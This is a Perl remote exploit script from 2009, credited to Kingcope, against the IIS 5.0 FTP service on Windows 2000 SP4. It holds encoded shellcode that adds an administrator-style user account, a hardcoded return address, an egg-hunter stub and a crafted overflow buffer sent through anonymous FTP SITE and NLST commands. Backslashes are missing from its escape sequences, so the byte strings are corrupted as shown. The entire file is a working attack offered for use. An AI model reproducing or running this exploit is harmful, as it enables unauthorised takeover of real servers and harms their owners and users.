# IIS 5.0 FTPd / Remote r00t exploit 
# Win2k SP4 targets 
# bug found & exploited by Kingcope, kcope2<at>googlemail.com 
# Affects IIS6 with stack cookie protection 
# August 2009 - KEEP THIS 0DAY PRIV8 
use IO::Socket; 
$|=1; 
#metasploit shellcode, adduser "winown:nwoniw" 
$sc = "x89xe2xdaxdexd9x72xf4x5bx53x59x49x49x49x49" . 
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" . 
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" . 
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" . 
"x42x75x4ax49x4bx4cx4ax48x50x44x43x30x43x30" . 
"x43x30x4cx4bx47x35x47x4cx4cx4bx43x4cx45x55" . 
"x42x58x45x51x4ax4fx4cx4bx50x4fx45x48x4cx4b" . 
"x51x4fx51x30x43x31x4ax4bx47x39x4cx4bx47x44" . 
"x4cx4bx43x31x4ax4ex50x31x49x50x4cx59x4ex4c" . 
"x4cx44x49x50x44x34x43x37x49x51x49x5ax44x4d" . 
"x43x31x49x52x4ax4bx4cx34x47x4bx51x44x46x44" . 
"x43x34x43x45x4ax45x4cx4bx51x4fx51x34x43x31" . 
"x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4f" . 
"x45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx45x51" . 
"x4ax4bx4bx39x51x4cx46x44x44x44x48x43x51x4f" . 
"x46x51x4cx36x43x50x50x56x45x34x4cx4bx50x46" . 
"x50x30x4cx4bx47x30x44x4cx4cx4bx42x50x45x4c" . 
"x4ex4dx4cx4bx42x48x45x58x4dx59x4ax58x4cx43" . 
"x49x50x43x5ax46x30x43x58x4cx30x4cx4ax44x44" .
"x51x4fx43x58x4ax38x4bx4ex4dx5ax44x4ex50x57" . 
"x4bx4fx4ax47x42x43x42x4dx45x34x46x4ex42x45" . 
"x44x38x43x55x47x50x46x4fx45x33x47x50x42x4e" . 
"x42x45x43x44x51x30x44x35x44x33x45x35x44x32" . 
"x51x30x43x47x43x59x42x4ex42x4fx43x47x42x4e" . 
"x51x30x42x4ex44x37x42x4fx42x4ex45x39x43x47" . 
"x47x50x46x4fx51x51x50x44x47x34x51x30x46x46" . 
"x51x36x51x30x42x4ex42x45x44x34x51x30x42x4c" . 
"x42x4fx43x53x45x31x42x4cx42x47x43x42x42x4f" . 
"x43x45x42x50x47x50x47x31x42x44x42x4dx45x39" . 
"x42x4ex42x49x42x53x43x44x43x42x45x31x44x34" . 
"x42x4fx43x42x43x43x47x50x42x57x45x39x42x4e" . 
"x42x4fx42x57x42x4ex47x50x46x4fx47x31x51x54" . 
"x51x54x43x30x41x41"; 
#1ca 
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2n"; 
if ($#ARGV ne 1) { 
print "usage: iiz5.pl <target> <your local ip>n"; 
exit(0); 
} 
srand(time()); 
$port = int(rand(31337-1022)) + 1025; 
$locip = $ARGV[1]; 
$locip =~ s/./,/gi; 
if (fork()) { 
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => '21', 
                              Proto    => 'tcp'); 
$patch = "x7ExF1xFAx7F"; 
#$retaddr = "ZZZZ"; 
$retaddr = "x9BxB1xF4x77"; # JMP ESP univ on 2 win2k platforms 
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5); 
# top address of stack frame where shellcode resides, is hardcoded inside this block 
$findsc="xB8x55x55x52x55x35x55x55x55x55x40x81x38x53" 
   ."x45x58x59x75xF7x40x40x40x40xFFxFFxE0"; 
# attack buffer 
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. 
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. 
   "HHHHIIII". 
$patch."JKKK"."xE9x63xFExFFxFFxFFxFF"."NNNN"; 
$x = <$sock>; 
print $x;                             
print $sock "USER anonymousrn"; 
$x = <$sock>; 
print $x; 
print $sock "PASS anonymousrn"; 
$x = <$sock>; 
print $x; 
print $sock "MKD w00t$portrn"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; # We store shellcode in memory of process (stack) 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>;
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>; 
print $x; 
print $sock "CWD w00t$portrn"; 
$x = <$sock>; 
print $x; 
print $sock "MKD CCC". "$crn"; 
$x = <$sock>; 
print $x; 
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "rn"; 
$x = <$sock>; 
print $x; 
# TRIGGER 
print $sock "NLST $c*/../C*/rn"; 
$x = <$sock>; 
print $x; 
while (1) {} 
} else { 
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); 
die "Could not create socket: $!n" unless $servsock; 
my $new_sock = $servsock->accept(); 
while(<$new_sock>) { 
print $_; 
} 
close($servsock); 
} 
#Cheerio, 
# 
#Kingcope

# www.Syue.com [2009-08-31]